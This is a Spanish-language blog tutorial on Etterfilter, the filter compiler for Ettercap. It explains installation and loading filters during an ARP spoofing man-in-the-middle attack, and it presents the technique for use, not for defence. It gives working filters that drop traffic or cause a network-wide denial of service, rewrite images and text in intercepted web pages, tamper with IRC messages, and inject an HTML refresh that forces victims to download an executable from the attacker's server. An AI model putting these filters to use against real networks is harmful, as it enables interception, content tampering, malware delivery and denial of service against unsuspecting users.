Blog

Jugando con Etterfilter

Hola a todos!

Hoy vamos a aprender a utilizar Etterfilter, pero antes de todo, que expliquemos que es esta herramienta.

Etterfilter es una herramienta auxiliar de Ettercap que sirve para crearnos nuestros propios filtros para poder modificar en tiempo real los paquetes que capturamos con Ettercap.

para intalarlo basta con instalar Ettercap:

·Ubuntu:

“sudo apt-get install ettercap-gtk”

·Archlinux:

“sudo pacman -S ettercap-gtk”

 

El comando etterfilter consta de 3 configuraciones:

-o     (Nombre del archivo de salida)

-t     (Ejecuta a modo de prueba el filtro)

-d    (Muestra informacion de debuj durante la compilacion del filtro)

 

confs

 

Un ejemplo básico del uso de Etterfilter seria el comando:

“etterfielter Filtro.txt -o Filtro.ef”

Una vez el filtro se haya compilado, para cargarlo en Ettercap introduciríamos la siguiente orden:

“sudo ettercap -T -q -F Filtro.ef -M ARP // //”


Algunos Filtros interesantes:

 

1) Bloquear todo el trafico de un protocolo:

if (ip.proto == PROTOCOLO) {       # ip.proto == TCP por ejemplo...
     drop();
     kill();
}
2) Bloquear una IP:
if (ip.src == 'IPaBloquear'|| ip.dst == 'IPaBloquear') {       # Si la IP es la del router provocariamos un DoS a toda la red.
     drop();
     kill();
}
3) Cambiar imágenes por las que nosotros queramos:
if (ip.proto == TCP && tcp.src == 80) {
     replace("img src=", "img src=\"URL_de_la_nueva_imagen\" ");
     replace("IMG SRC=", "img src=\"URL_de_la_nueva_imagen\" ");
}
4) Cambiar texto por el que nosotros queramos:
if (ip.proto == TCP && tcp.src == 80) {
     replace("TextoOriginal", "TextoNuevo");
}
5) Obligar a descargar un ejecutable o redirigir a otra web:
 if (ip.proto == TCP && tcp.src == 80) {
     drop();
     Inject("html.txt");
}
Donde html.txt tine que ser similar a:
<html>
   <head>
      <meta http-equiv="Refresh"content="0; URL=URL-de-nuestro-servidor/ejecutable.exe">
   </head>
   <body></body>
</html>
6) Modificar conversación IRC:

if (ip.proto == TCP) {

      if (tcp.src == 6667 || tcp.dst == 6667) {

           if (search(DATA.data, "")) {

                replace(“PalabraOriginal", “PalabraNueva");

           }

      }

}

Bueno, eso ha sido todo por hoy, espero que os haya gustado y sido de utilidad; si teneis algún otro filtro que quisierais compartir dejadlo en los comentarios.

Un Saludo!

Autor:  Salva Corts     @SalvaCorts    salva@highsec.es

Leave a Reply

*

    No Twitter Messages